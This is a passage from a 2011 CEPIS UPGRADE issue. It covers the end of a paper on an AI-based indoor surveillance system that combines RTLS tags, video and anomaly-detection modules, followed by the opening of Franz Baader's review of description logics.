a human providing the intelligence to the system
”
culated as a sum of the previous position (e.g. xn) and a product between the
previous velocity (e.g. vx,n) and the time
between the consecutive measurements
Ät for each direction separately. The
velocities remain constant. Equation
(2) gives the exact vector formula used
to calculate the next state of the
Kalman filter. The measurement noise
covariance matrix was set based on
RTLS system specification, while the
process noise covariance matrix was
fine-tuned experimentally.
Once the measurements are filtered, primitive routines can be applied. They are a set of basic preprocessing methods used by all the
PDR modules and are robust to noise
in 3D location measurements. They
take short intervals of RTLS data as
input and output a symbolic representation of the processed RTLS data.
⎡ xn +1 ⎤ ⎡1
⎢y ⎥ ⎢
⎢ n +1 ⎥ ⎢0
⎢ z n +1 ⎥ ⎢0
⎥=⎢
⎢
v
⎢ x , n +1 ⎥ ⎢0
⎢v y , n +1 ⎥ ⎢0
⎥ ⎢
⎢
⎢⎣ v z , n +1 ⎥⎦ ⎣⎢0
0
1
0
0
0
0
0 ∆t
0 0
1 0
0 1
0 0
0 0
The first primitive routine detects
in which area (e.g., a room or a userdefined area) a given tag is located,
when it has entered, and when it has
exited from the area. The routine takes
into account the positions of walls and
doors. A special method is used to handle the situations when a tag moves
along the boundary between two areas
that are not separated by a wall.
The second primitive routine classifies the posture of a person wearing
a tag into: standing, sitting, or lying. A
parameterized classifier, trained on
104
pre-recorded and hand-labelled training data, is used to classify the sequences of tag heights into the three
postures. The algorithm has three parameters: the first two are thresholds
tlo and thi dividing the height of a tag
into the three states, while the third parameter is tolerance d. The algorithm
stores the previous posture and adjusts
the boundaries between the postures
according to it (Figure 2). If the current state is below the threshold ti, it is
increased by d, otherwise it is decreased by d. The new posture is set to
the posture that occurs most often in
the window of consecutive tag heights
according to the dynamically set
thresholds. The thresholds tlo and thi were
obtained from the classification tree that
classifies the posture of a person based
on the height of a tag. It was trained on
half an hour long manually labelled re-
0
∆t
0
0
1
0
0 ⎤ ⎡ xn ⎤
⎥
⎢
0 ⎥⎥ ⎢ yn ⎥
∆t ⎥ ⎢ zn ⎥
⎥
⎥⎢
0 ⎥ ⎢vx, n ⎥
0 ⎥ ⎢v y , n ⎥
⎥
⎥⎢
1 ⎦⎥ ⎢⎣ v z , n ⎥⎦
(2)
cording of lying, sitting and standing.
The third group of primitive routines is a set of routines that detect
whether a tag is moving or not. This is
not a trivial task due to the considerable amount of noise in the 3D location data. There are separate routines
for detecting movement of persons,
movable objects (e.g., a laptop) and
objects that are considered stationary.
The routines include hardcoded,
handcrafted, common sense algorithms
and a classifier trained on extensive,
pre-recorded, hand labelled training
set. The classifier uses the following
attributes calculated in a sliding window with size 20: the average speed,
the approximate distance travelled,
sum of consecutive position distances,
and the standard deviation of moving
direction. The classifier was trained on
more than two hours long hand-labelled recording of consecutive moving and standing still. Despite the noise
in the RTLS measurements the classification accuracy of 95 % per single
classification was achieved. [12] describes the classifier in more detail.
The final group of routines detects
if two tags (or a tag and a given 3D
position) are close together by comparing the short sequences of tags’ positions. There are separate methods used
for detecting distances between two
persons (e.g., used to detect if a visitor
is too far away from its host), between
Figure 2: Dynamic Thresholds.
CEPIS UPGRADE Vol. XII, No. 5, December 2011
Farewell Edition
© CEPIS
UPENET
“
The PDR system detects intrusions of unidentified persons,
forbidden actions of known and unknown persons
and unusual activities of tagged entities
”
a person and an object, and between a
person and a given 3D location (e.g.,
used to assign tags of moving persons
to locations of moving objects detected
by video processing).
All of the described primitive routines are robust to the noise in RTLS
measurements and are specialized for
the PDR’s RTLS. Primitive routines’
parameters were tuned according to the
noise of the RTLS and using data mining tools Orange [4] and Weka [16].
In case of more accurate RTLS, the
primitive routines could be simpler and
more accurate. Nevertheless, the presented primitive routines perform well
despite the considerable amount of
noise. This is possible because of the
relatively high update rate. If it was significantly lower, the primitive routines
would not work as well. Therefore, the
accuracy, reliability and update rate of
RTLS are crucial for the performance
of the entire PDR system.
4 PDR Modules
4.1 Expert System Module
The Expert System Module enables
the supervisor to customize the PDR
system according to his/her needs by
setting simple rules that must not be
violated. It is the simplest and the most
reliable module of the PDR system
[11]. It is capable of detecting a vast
majority of the predictable security
risks, enables simple customization, is
reliable, robust to noise, raises almost
no false alarms, and offers comprehensible explanation for the raised alarms.
In addition, it does not suffer from the
typical problems common to the learning modules/algorithms, such as long
learning curve, difficulty to learn from
unlabeled data, relatively high probability of false alarms, and the elusive
balance between false negative and
false positive classifications. The expert system consists of three parts described in the following subsections.
© CEPIS
4.1.1 Knowledge Base
Knowledge base of an expert system contains the currently available
knowledge about the state of the world.
The knowledge base of PDR expert
system consists of RTLS data,
predefined rules, and user-defined
rules. The first type of knowledge is in
form of data stream, while the latter
two are in form of if-then rules.
The expert system gets the knowledge about objects’ positions from the
RTLS data stream. Each unit of the data
stream is a filtered RTLS measurement
that contains a 3D location with a time
stamp and a RTLS tag ID.
User-defined rules enable simple
customization of the expert system according to specific supervisor’s needs
by specifying prohibited and obligatory behaviour. Supervisor can add,
edit, view, and delete the rules at any
time using an intuitive graphic user
interface. There are several rule templates available. The supervisor has to
specify only the missing parameters of
the rules, such as for which entities
(tags), in which room(s) or user-defined areas(s), and at which time the
rules apply.
For instance, a supervisor can
choose to add a rule based on the following template: "Person P must be in
the room R from time Tmin to time Tmax."
and set P to John Smith, R to the hallway H, Tmin to 7 am, and Tmax to 11 am.
Now the expert system knows that John
must be in the hallway from 7 am to
11 am. If he leaves the hallway during
that period or if he does not enter it
before 7 am, the PDR supervisor will
be notified.
Some of the most often used rule
templates are listed below:
„ Object Oi is not allowed to enter area Ai.
„ Object Oi can only be moved by
object Oj.
„ Object Oi must always be close
to object Oj.
Farewell Edition
The predefined rules are a set of
rules that are valid in any application
where PDR might be used. Nevertheless, the supervisor has an option to
turn them on or off. Predefined rules
define when alarms about hardware
failures should be triggered.
4.1.2 Inference Engine
The inference engine is the part of
the PDR expert system that deduces
conclusions about security risks from
the knowledge stored in the knowledge
base. The inference process is done in
real-time. First, the RTLS data stream
is processed using the primitive routines. Second, all the rules related to a
given object (e.g., a person) are
checked. If a rule fires, an alarm is
raised and an explanation for the raised
alarm is generated. An example is presented in the next paragraph.
Suppose that the most recent 3D
location of John Smith’s tag (from the
previous example) has just been received at 8:32 am. The inference engine checks all the rules concerning
John Smith. Among them is the rule Ri
that says: "John Smith must be in the
hallway H from 7 am to 11 am." The
inference engine calls the primitive
routine that checks whether John is in
the hallway H. There are two possible
outcomes. In the first outcome, he is
in the hallway H, therefore, the rule Ri
is not violated. If John was not in the
hallway H in the previous instant, there
is an ongoing alarm that is now ended
by the inference engine. In the second
outcome, John is not in the hallway H;
hence the rule Ri is violated at this moment. In this case the inference engine
checks if there is an ongoing alarm
about John not being in the hallway H.
If there is no such ongoing alarm the
inference engine triggers a new alarm.
On the other hand, if there is such an
alarm, the inference engine knows that
the PDR supervisor was already notified about it.
CEPIS UPGRADE Vol. XII, No. 5, December 2011 105
UPENET
“
Our work is novel as it uses several complex artificial
intelligence methods to extract models of the usual behaviour
and detect the unusual behaviour based on an indoor RTLS
If an alarm was raised every time a
rule was violated, the supervisors
would get flooded with alarm messages. Therefore, the inference engine
automatically decreases the number of
alarm messages and groups alarm messages about the same incident together
so that they are easier to handle by the
PDR supervisor. The method will be
illustrated with an example. Because
of the noise in 3D location measurements the inference engine does not
trigger or end an alarm immediately
after the status of rule Ri (violated/not
violated) changes. Instead it waits for
more RTLS measurements and checks
the trend in the given time window: if
there are only few instances when the
rule was violated they are considered
as noise. On the other hand, if there
are many (over the global threshold set
by the supervisor) such instances, then
the instances when rule was not violated are treated as noise. Two consecutive alarms that are interrupted by a
short period of time will therefore result in a single alarm message. A short
”
period in which a rule seems to be violated because of the noise in RTLS
data, however, will not trigger an
alarm. The grouping of alarms works
in the following way: the inference
engine groups the alarm messages
based on the two rules Ri and Rj together if at the time when rule Ri is violated another rule Rj concerning John
Smith or hallway H is violated too. As
a result, the supervisor has to deal with
fewer alarm messages.
4.1.3 Generating Alarm Explanations
The Expert System Module also
provides the supervisor with an explanation of the alarm. It consists of three
parts: explanation in natural language,
graphical explanation, and video recording of the event.
Each alarm is a result of a particular rule violation. Since each rule is an
instance of a certain rule template, explanations are partially prepared in
advance. Each rule template has an
assigned pattern in the form of a sentence in natural language with some
Figure 3: Video Explanation of an Alarm.
106
CEPIS UPGRADE Vol. XII, No. 5, December 2011
objects and subjects missing. In order
to generate the full explanation, the
inference engine fills in the missing
parts of the sentence with details about
the objects (e.g., person names, areas,
times, etc.) related to the alarm.
Graphical explanation is given in
form of a ground plan animation and
can be played upon supervisors’ request. The inference engine determines
the start and the end times of an alarm
and sets the animation to begin slightly
before the alarm was caused and to end
slightly after the causes for the alarm
are no longer present. The animation
is generated from the recorded RTLS
data and the ground plan of the building under surveillance. The animated
objects (e.g., persons, objects, areas)
that are relevant to the alarm are highlighted with red colour.
If a video recording of the incident
that caused an alarm is available it is
added to the alarm explanation. Based
on the location of the person that
caused the alarm, the person in the
video recording is marked with a
bounding rectangle (Figure 3). The
video explanation is especially important if an alarm is caused by a person
or object without a tag.
The natural language explanation,
ground plan animation, and video recordings with embedded bounding rectangles produced by the PDR expert
system efficiently indicate when and
to which events the security personnel
should pay attention.
4.2 Video Module
The video Module periodically
checks if the movement detected by the
video cameras is caused by people
marked with tags. If it detects movement in an area where no authorised
humans are located, it triggers an
alarm. It combines the data about tag
locations and visible movement to reason about unauthorised entry.
Farewell Edition
© CEPIS
< 80 %
> 20 %
flow
lower cumulative
probability of event
oddity of events
UPENET
fhi frequency
of events
Figure 4: Calculating the Oddity of Events.
Data about visible moving objects
(with or without tags) is available as
the output of video pre-processing.
Moving objects are described with
their 3D locations in the same coordinate system as RTLS data, sizes of their
bounding boxes, similarity of the moving object with a human, and a time
stamp. The detailed description of the
algorithm that processes the video data
(developed at the Faculty of Electrical
Engineering, University of Ljubljana,
Slovenia) can be found in [9] and [10].
The Video Module determines the
pairing between the locations of tagged
personnel and the detected movement
locations. If it determines that there is
movement in a location that is far
enough from all the tagged personnel,
it raises an alarm. In this case the module reports moving of an unauthorised
person or an unknown object (e.g., a
robot) based on the similarity between
the moving object and a person. The
probability of false alarms can be reduced if several cameras are used to
monitor the area from various angles.
It also enables more accurate localization of moving objects.
Whenever the Video Module triggers an alarm it also offers an explanation for it in form of video recordings
with embedded bounding boxes highlighting the critical areas (Figure 3).
The supervisor of the PDR system can
quickly determine whether the alarm
is true or false by checking the supplied video recording.
The video pre-processing algorithm
is also capable of detecting if a certain
camera is blocked (e.g. covered with a
piece of fabric). Such information is
forwarded to the Video Module that
triggers an alarm.
4.3Fuzzy Logic Module
The Fuzzy Logic Module is based
on the following presumption: frequent
behaviour is usual and therefore uninteresting while rare behaviour is interesting as it is highly possible that it is
unwanted or at least unusual. Therefore the module counts the number of
actions done by the object under surveillance and reasons about oddity of
the observed behaviour based on the
counters. If it detects a high number of
odd events (i.e., events that rarely took
place in the past) in a short period of
time, it triggers an alarm.
The knowledge of the module is
stored in two four- dimensional arrays
of counters for each object under surveillance (implemented as red-black
“
trees [2]). Events are split into two categories, hence the two arrays: events
caused by movement and stationary
events. A moving event is characterised by its location, direction, and the
speed of movement. A stationary event,
on the other hand, is characterised by
location, duration and posture (lying,
sitting, or standing). When an event is
characterised, fuzzy discretization [17]
is used, hence the name of the module.
The location of an event in the floor
plane is determined using the RTLS
system and discretized in classes with
size 50 cm, therefore the module considers the area under surveillance as a
grid of 50 by 50 cm squares. The speed
of movement is estimated by the
Kalman filter. It is used to calculate the
direction which is discretized in the 8
classes (N, NE, E, SE, S, SW, W, and
NW). The scalar velocity is discretized
in the following four classes: very
slow, slow, normal, and fast. The posture is determined by a primitive routine (see Section 3.3). The duration of
an event is discretized in the following classes: 1, 2, 4, 8, 15, 30, seconds,
minutes or hours.
The fuzzy discretization has four
major advantages. The first is a smaller
amount of memory needed to store the
counters, as there is only one counter
for a whole group of similar events.
Note that the accuracy of the stored
knowledge is not significantly decreased because the discrete classes are
relatively small. The second advantage
is the time complexity of counting the
events that are similar to a given event,
which is constant instead of being dependent on the number of events seen
in the past. The third advantage is the
linear interpolation implicitly introduced by fuzzy discretization, which
enables a more accurate estimation of
the rare events’ frequencies. The fourth
advantage is the low time complexity
of updating the counters’ values compared to the time complexity of adding a new counter with value 1 for each
The advantages of a RTLS are that people feel more
comfortable being tracked by it than being filmed by video cameras
© CEPIS
Farewell Edition
”
CEPIS UPGRADE Vol. XII, No. 5, December 2011 107
UPENET
“
The PDR software is divided into five modules:
Video, Expert System, Statistic, Macro and Fuzzy Logic
new event.
The oddity of the observed behaviour is calculated using a sliding window over which the average oddity of
events is calculated. Averaging the
oddity over time intervals prevents the
false alarms that would be triggered if
the oddity of single events was used
whenever RTLS data noise or short
sequences of uncommon events would
occur. The oddity of a single event is
calculated by comparing the frequency
of events similar to the given event
with the frequencies of the other
events. For this purpose the supervisor sets the two relative frequencies flow
and fhi. The threshold flow determines the
share of the rarest events that are
treated as completely unusual and
therefore they get assigned the maximum level of oddity. On the other hand,
fhi determines the share of the most frequent events that are treated as completely usual and therefore they get
assigned 0 as the level of oddity. The
oddity of an event whose frequency is
between the thresholds flow and fhi is linearly decreasing with the increasing
share of the events that are rarer than
the given event (Figure 4).
The drawback of the described
method is a relatively long learning
period which is needed before the module starts to perform well. On the other
hand, the module discards the outdated
knowledge and emphasizes the new
data, which enables adapting to the
gradual changes in observed person’s
behaviour. The module is also highly
responsive: it takes only about 3 seconds to detect the unusual behaviour.
The module autonomously learns the
model of usual behaviour which enables the detection of the unusual behaviour. It can detect events such as
an unconscious person lying on the
floor, running in a room where people
usually do not run, a person sitting at
the table at which he usually does not
sit etc. The module also triggers an
alarm when a long sequence of events
108
happens for the first time. If such false
alarm is triggered, the supervisor can
mark it as false. Consequently, the
module will increase the appropriate
counters and will not raise an alarm for
that kind of behaviour in the future.
When the Fuzzy Logic Module
triggers an alarm, it also provides a
graphical explanation for it. It draws a
target-like graph in each square of the
mesh dividing the observed area. The
colour of a sector of the target represents the frequency of a given group
of similar events. The concentric circles represent the speed of movement,
e.g., a small radius represents a low
speed. The triangles, on the other hand,
represent the direction of movement.
The location of a target on the mesh
represents the location in the physical
area. White colour depicts the lowest
frequency, black colour depicts the
highest frequency while the shades of
grey depict the frequencies in between.
The events that caused an alarm are
highlighted with a scale ranging from
green to red. For stationary events, tables are used instead of the targets. The
row of the table represents the posture
while the column represents the duration. A supervisor can read the graphical explanations quickly and effectively. The visualization is also used for
the general analysis of the behaviour
in the observed area.
4.4 Macro and Statistic Modules
Macro and Statistic modules analyse persons’ behaviour and trigger
alarms if it significantly deviates from
the usual behaviour. In order to do that,
several statistics about the movement
of each tagged person are collected,
calculated, and averaged over various
time periods. Afterwards, these statistics are compared to the previously
stored statistics of the same person and
the deviation factor is calculated. If it
exceeds the predefined bound, the
modules trigger an alarm.
The Statistic Module collects data
CEPIS UPGRADE Vol. XII, No. 5, December 2011
”
over time periods from one minute to
several hours regardless of person’s
location or context. On the other hand,
the Macro Module collects data regarding behaviour in certain areas (e.g.
room), i.e. the behaviour collection
starts when a person enters the area and
ends when he/she leaves it.
Both modules use behaviour attributes such as: the percentage of the
time the person spent lying, sitting,
standing, or walking during the observed time period, the average walking speed. Additionally, Macro module uses the following attributes: area
id, day of the week, length of stay, entrance time, and exit time.
The behaviours are classified with
the LOF algorithm [3], a density-based
kNN algorithm, which calculates the
local outlier factor of the tested instance with respect to the learning instances. The LOF algorithm was chosen based on the study [14]. Bias towards false positives or false negatives
can be adjusted by setting the alarm
threshold.
The modules show a graphical explanation for each alarm in form of
parallel coordinates plot. Each attribute
is represented with one of the parallel
vertical axes, while statistics about
given time periods are represented by
a zigzag line connecting values of each
attribute from the leftmost to the
rightmost one. Past behaviour is represented with green zigzag lines, while
the zigzag line portending to the behaviour that triggered the alarm is collared red. The visualisation offers a
quick and simple way of establishing
the cause of alarm and often indicates
more specific reason for it.
5 Verification
Due to the complexity of the PDR
system and the diverse tasks that it performs it is difficult to verify its quality
with a single test or to summarize it in
a single number such as true positive
rate. Therefore, validation was done on
Farewell Edition
© CEPIS
UPENET
Module
TP
TN
FP
FN
N
Expert Sys.
197
199
2
2
400
Video
30
30
0
0
60
Fuzzy Logic
47
42
8
3
100
Macro
9
10
1
0
20
Statistic
9
10
1
0
20
Total
292
291
12
5
600
Percentage
(%)
48.7
48.5
2
0.8
Table 1: Evaluation of PDR System.
more subjective and qualitative level
with several scenarios for each of the
individual modules. Four demonstration videos of the PDR tests are available at http://www.youtube.com/user/
ijsdis. A single test case or a scenario
is a sequence of actions and events including a security risk that should be
detected by the system. "A person enters a room without the permission" is
an example of scenario. Each scenario
has a complement pair: a similar sequence of actions which, on the contrary, must not trigger an alarm. "A
person with permission enters the
room" is the complement scenario for
the above example. The scenarios and
their complements were carefully defined in cooperation and under supervision of security experts from the
Slovenian Ministry of Defence .
The Expert System Module was
tested with two to three scenarios per
expert rule template. Each scenario was
performed ten times with various persons and objects. The module has perfect accuracy (no false positives and
no false negatives) in cases when the
RTLS noise was within the normal limits. When the noise was extremely
large, the system occasionally triggered
false alarms or overlooked security
risks. However, in those cases even
human experts were not able to tell if
the observed behaviour should trigger
an alarm or not based on the noisy
RTLS measurements alone. Furthermore, the extreme RTLS noise occurred in less than 2 % of the scenario
repetitions and the system made an error in less than 50 % of those cases.
The Video Module was tested using the following three scenarios: "a
person enters the area under surveillance without the RTLS tag", "a robot
is moving without authorised person’s
presence", and "a security camera is
intentionally obscured". Scenarios
were repeated ten times with different
people as actors. The module detected
the security risks in all of the scenario
repetitions with movement and distinguished between a human and a robot
perfectly. It failed to detect the obscured camera in one out of 10 repetitions. The module also did not trigger
any false alarms.
The Fuzzy Logic Module was
tested with several scenarios while the
fuzzy knowledge was gathered over
two weeks. The module successfully
detected a person lying on the floor,
sitting on colleagues chair for a while,
running in a room, walking on a table,
crawling under a table, squeezing behind a wardrobe, standing on the same
spot for extended period of time, and
similar unusual events. However, the
experts’ opinion was that some of the
alarms should not have been triggered.
“
Indeed we expect that in more extensive tests the modules supervised learning capabilities would prevent further
repetitions of unnecessary alarms.
The test of the Macro and Statistic
Modules included the simulation of a
usual day at work condensed into one
hour. The statistic time periods were 2
minutes long. Since the modules require a collection of persons’ past behaviour, two usual days of work were
recorded by a person constituting of
two hours of past behaviour data. Afterwards, the following activities were
performed 10 times by the same person and classified: performing a normal day of work, stealing a container
with classified data, acting agitated as
under the effect of drugs and running.
The classification accuracy was 90 %.
This was due to the low amount of past
behaviour data. Therefore, the modules
did not learn the usual behaviour of the
test person but only a condensed (simulated) behaviour in a limited learning
time. We expect that the classification
accuracy would be even higher, if the
learning time was extended and if the
person would act as usual instead of
simulating the condensed day of work.
The overall system performance
was tested on a single scenario: "stealing a container with classified documents". In the test five persons tried to
steal the container from a cabinet in a
small room under surveillance. Each
person tried to steal the container five
times with and without a tag. All the
attempts were successfully detected by
the system that reported the alarm and
provided an explanation for it.
The validation test data is summarized in Table 1. It gives the number of
true positive (TP), true negative (TN),
false positive (FP), and false negative
alarms (FN), and total number (N) of
scenario repetitions. Each row gives
the results for one of the five modules.
The bottom two rows give the total sum
for each column and the relative percentage.
The system is customizable and can be used in a range of
security applications such as confidential data archives and banks
© CEPIS
Farewell Edition
”
CEPIS UPGRADE Vol. XII, No. 5, December 2011 109
UPENET
The system received the award for
the best innovation among research
groups in Slovenia for 2009 at the Fourth
Slovenian Forum of Innovations.
6 Conclusion
This paper presents an intelligent
surveillance system utilizing a realtime location system (RTLS), video
cameras, and artificial intelligence
methods. It is designed for surveillance
of high security indoor environments
and is focused on internal security
threats. The data about movement of
personnel and important equipment is
gathered by RTLS and video cameras.
After basic pre-processing with filters
and primitive routines the data is sent
to the five independent software modules. Each of them is specialized for
detecting specific security risk. The
Expert System Module detects suspicious situations that can be described
by location of a person or other tagged
objects in space and time. It detects
many different scenarios with high accuracy. The Video Module automatically detects movement of persons and
objects without tags, which is not allowed inside the surveillance area.
Fuzzy Logic, Macro, and Statistics
Modules automatically extract the
usual movement patterns of personnel
and equipment and detect deviations
from the usual behaviour. Fuzzy Logic
is focused on short-term anomalous behaviour such as entering an area for the
first time, lying on the ground or walking on the table. Macro and Statistic
Modules, on the other hand, are focused
on mid- and long-term behaviour such
as deviations in daily work routine.
The validation of the system shows
that it is able to detect all the security
scenarios it was designed for and that
it does not raise too many false alarms
even in more challenging situations. In
addition, the system is customizable
and can be used in a range of security
applications such as confidential data
archives and banks.
Acknowledgement
Research presented in this paper was
financed by the Republic of Slovenia, Ministry of Defence. We would like to thank
the colleges from the Machine Vision
110
Laboratory, Faculty of Electrical Engineering, University of Ljubljana, Slovenia and
Spica International, d.o.o. for fruitful cooperation on the project. Thanks also to
Boštjan Kaluza, Mitja Lustrek, and Bogdan
Pogorelc for help regarding the RTLS and
discussions, and Anze Rode for discussions
about security systems, expert system rules
templates and specification of scenarios.
References
[1] G. R. Arce. "Nonlinear Signal
Processing: A Statistical Approach",
Wiley: New Jersey, USA, 2005.
[2] R. Bayer. "Symmetric Binary BTrees: Data Structures and Maintenance Algorithms", Acta Informática, 1, pp. 290–306, 1972.
[3] M. M. Breunig, H. P. Kriegel, R. T.
Ng, J. Sander. "LOF: Identifying
densitybased local outliers," Proceedings of the International Conference on Management of Data –
SIGMOD ’00, pp. 93–104, Dallas,
Texas, 2000.
[4] J. Demsar, B. Zupan, G. Leban. "Orange: From Experimental Machine
Learning to Interactive Data Mining," White Paper (www. ailab.si/
orange), Faculty of computer and
information science, University of
Ljubljana, Slovenia, 2004.
[5] M. Gams, T. Tusar. (2007), "Intelligent High-Security Access Control", Informatica, vol 31(4), pp.
469-477.
[6] R.E. Kalman. "A new approach to
linear filtering and prediction problems". Journal of Basic Engineering, 82 (1), pp. 35–45, 1960.
[7] M. Kolbe, M. Gams. "Towards an
intelligent biometric system for access control," Proceedings of the
9th International Multiconference
Information Society - IS 2006,
Ljubljana, Slovenia, 2006, pp. 118122.
[8] B. Krausz, R. Herpers. ‘Event detection for video surveillance using
an expert system’, Proceedings of
the 1st ACM Workshop on Analysis and Retrieval of Events/Actions
and Workflows in Video Streams AREA 2008, Vancouver, Canada,
pp. 49-56.
[9] M. Kristan, J. Pers, M. Perse, S.
Kovaèiè. "Closed-world tracking of
CEPIS UPGRADE Vol. XII, No. 5, December 2011
[10]
[11]
[12]
[13]
[14]
[15]
[16]
[17]
[18]
[19]
[20]
[21]
multiple interacting targets for indoor-sports applications", Computer Vision and Image Understanding, vol 113, 5, pp. 598-611, 2009.
M. Perše, M. Kristan, S. Kovaèiè,
G. Vuèkoviæ, J. Pers. "A trajectorybased analysis of coordinated team
activity in a basketball game", Computer Vision and Image Understanding, vol 113, 5, pp. 612-621,
2009.
R. Piltaver, G. Matjas. "Expert system as a part of intelligent surveillance system", Proceedings of the
18th International Electrotechnical
and Computer Science Conference
- ERK 2009, vol. B, pp. 191–194,
2009.
R. Piltaver. "Strojno uèenje pri
naèrtovanju algoritmov za
razpoznavanje tipov gibanja", Proceedings of the 11th International
Multiconference Information Society - IS 2008, str. 13–17, 2008.
V. Schwarz, A. Huber, M. Tüchler.
"Accuracy of a Commercial UWB
3D Location Tracking System and
its Impact on LT Application Scenarios," Proceedings of the IEEE
International Conference on UltraWideband, Zürich, Switzerland,
2005.
T. Tusar, M. Gams. "Odkrivanje
izjem na primeru inteligentnega
sistema za kontrolo pristopa," Proceedings of the 9th International
Multiconference Information Society - IS 2006, Ljubljana, Slovenia,
2006, pp. 136-139.
Ubisense: awailable at: http://
www.ubisense.net/
H. Witten, E. Frank. Data Mining.
"Practical Machine Learning Tools
and Techniques" (2nd edition),
Morgan Kaufmann, 2005.
L. A. Zadeh. "Fuzzy sets", Information and Control 8 (3), pp. 338–353,
1965.
http://www.pervcomconsulting.
com/secure.html
http://www.visonictech.com/Active-RFID-RTLS-Tracking-andMangement-Software-Eiris.html
http://www.aeroscout.com/content/
healthcare
http://www.telargo.com/solutions/
track_trace.asp
Farewell Edition
© CEPIS
UPENET
Knowledge Representation
What’s New in Description Logics
Franz Baader
© 2011 Informatik Spektrum
This paper was first published, in English, by Informatik-Spektrum (Volume 34, issue no. 5, October 2011, pp. 434-442). InformatikSpektrum (<http://www.springerlink.com/content/1432-122X/>), a UPENET partner, is a journal published, in German or English, by
Springer Verlag on behalf of the German CEPIS society GI (Gesellschaft für Informatik, <http://www.gi-ev.de/>) and the Swiss CEPIS
society SI (Schweizer Informatiker Gesellschaft - Société Suisse des Informaticiens, <http://www.s-i.ch/>)
Main stream research in Description Logics (DLs) until recently concentrated on increasing the expressive power of the
employed description language while keeping standard inference problems like subsumption and instance manageable in
the sense that highly-optimized reasoning procedure for them behave well in practice. One of the main successes of this
line of research was the adoption of OWL DL, which is based on an expressive DL, as the standard ontology language for
the Semantic Web. More recently, there has been a growing interest in more light-weight DLs, and in other kinds of
inference problems, mainly triggered by need in applications with large-scale ontologies. In this paper, we first review the
DL research leading to the very expressive DLs with practical inference procedures underlying OWL, and then sketch the
recent development of light-weight DLs and novel inference procedures.
Keywords: Description Logics, Logic-based Knowledge Representation Formalism, Ontology Languages,
OWL, Practical Reasoning Tools.
1 Mainstream DL research of the last 25 years:
towards very expressive DLs with practical inference procedures
Description Logics [BCNMP03] are a well-investigated family of logic-based knowledge representation
formalisms, which can be used to represent the conceptual knowledge of an application domain in a structured
and formally well-understood way. They are employed
in various application domains, such as natural language
processing, configuration, and databases, but their most
notable success so far is the adoption of the DL-based
language OWL 1 as standard ontology language for the
Semantic Web [HoPH03].
The name Description Logics is motivated by the fact
that, on the one hand, the important notions of the domain are described by concept descriptions, i.e., expressions that are built from atomic concepts (unary predicates) and atomic roles (binary predicates) using concept constructors. The expressivity of a particular DL is
determined by which concept constructors are available
in it. From a semantic point of view, concept names and
concept descriptions represent sets of individuals,
whereas roles represent binary relations between indi-
1
<http://www.w3.org/TR/owl-features/>.
© CEPIS
Farewell Edition
Author
Franz Baader is Full Professor for Theoretical Computer
Science at TU Dresden, Germany. He has obtained his PhD in
Computer Science at the University of Erlangen, Germany. He
was Senior Researcher at the German Research Institute for
Artificial Intelligence (DFKI) for four years, and Associate
Professor at RWTH Aachen, Germany, for eight years. His main
research area is Logic in Computer Science, in particular
knowledge representation (description logics, modal logics,
nonmonotonic logics) and automated deduction (term rewriting,
unification theory, combination of decision procedures).
<[email protected]>
viduals. For example, using the concept names Man,
Doctor, and Happy and the role names married and child,
the concept of "a man that is married to a doctor, and has
only happy children" can be expressed using the concept
description
On the other hand, DLs differ from their predecessors in that they are equipped with a formal, logic-based
“
In this paper we review
the Description Logics research
and recent developments
”
CEPIS UPGRADE Vol. XII, No. 5, December 2011 111
UPENET
semantics, which can, e.g., be given by a translation into first-order predicate logic. For example,
the above concept description can be translated into the following fifirst-order formula (with one
free variable x):
The motivation for introducing the early predecessors of DLs, such as semantic networks and
frames [Quil67, Mins81], actually was to develop means of representation that are closer to the
way humans represent knowledge than a representation in formal logics, like fifirst-order predicate
logic. Minsky [Mins81] even combined his introduction of the frame idea with a general rejection
of logic as an appropriate formalism for representing knowledge. However, once people tried to
equip these "formalisms" with a formal semantics, it turned out that they can be seen as syntactic
variants of (subclasses of) first-order predicate logic [Haye79, ScGC79]. Description Logics were
developed with the intention of keeping the advantages of the logic-based approach to knowledge
representation (like a formal model-theoretic semantics and well-defined inference problems), while
avoiding the disadvantages of using full first-order predicate logic (e.g., by using a variable-free
syntax that is easier to read, and by ensuring decidability of the important inference problems).
Concept descriptions can be used to define the terminology of the application domain, and to
make statements about a specific application situation in the assertional part of the knowledge
base. In its simplest form, a DL terminology (usually called TBox) can be used to introduce abbreviations for complex concept descriptions. For example, the concept definitions
define the concept of a man (woman) as a human that is not female (is female), and the concept
of a father as a man that has a child, where ┬ stands for the top concept (which is interpreted as the
universe of all individuals in the application domain). The above is a (very simple) example of an
acyclic TBox, which is a finite set of concept definitions that is unambiguous (i.e., every concept
name appears at most once on the left-hand side of a definition) and acyclic (i.e., there are no cyclic
dependencies between definitions). In general TBoxes, so-called general concept inclusions (GCIs)
can be used to state additional constraints on the interpretation of concepts and roles. In our example, it makes sense to state domain and range restrictions for the role child. The GCIs
say that only human beings can have human children, and that the child of a human being must
be human.
In the assertional part (ABox) of a DL knowledge base, facts about a specific application situation can be stated by introducing named individuals and relating them to concepts and roles. For
example, the assertions
state that John is a man, who has the female child Mackenzie.
Knowledge representation systems based on DLs provide their users with various inference
services that allow them to deduce implicit knowledge from the explicitly represented knowledge.
For instance, the subsumption algorithm allows one to determine subconcept-superconcept relationships. For example, w.r.t. the concept definitions from above, the concept Human subsumes the concept
Father since all instances of the second concept are necessarily instances of the first concept, i.e.,
whenever the above concept definitions are satisfied, then Father is interpreted as a subset of Human. With the help of the subsumption algorithm, one can compute the hierarchy of all concepts
defined in a TBox. This inference service is usually called classification. The instance algorithm
can be used to check whether an individual occurring in an ABox is necessarily an instance of a
given concept. For example, w.r.t. the above assertions, concept definitions, and GCIs, the individual MACKENZIE is an instance of the concept Human. With the help of the instance algorithm,
one can compute answers to instance queries, i.e., all individuals occurring in the ABox that are
instances of the query concept C.
In order to ensure a reasonable and predictable behavior of a DL system, the underlying inference problems (like the subsumption and the instance problem) should at least be decidable for the
DL employed by the system, and preferably of low complexity. Consequently, the expressive power
of the DL in question must be restricted in an appropriate way. If the imposed restrictions are too
112
CEPIS UPGRADE Vol. XII, No. 5, December 2011
Farewell Edition
© CEPIS
UPENET
severe, however, then the important notions of the application domain can no longer be specified using concept
descriptions. Investigating this trade-off between the
expressivity of DLs and the complexity of their inference problems has been one of the most important issues
in DL research.
The general opinion on the (worst-case) complexity
that is acceptable for a DL has changed dramatically over
time. Historically, in the early times of DL research people have concentrated on identifying formalisms for
which reasoning is tractable, i.e. can be performed in
polynomial time [Pate84]. The precursor of all DL systems, KL-ONE [BrSc85], as well as its early successor
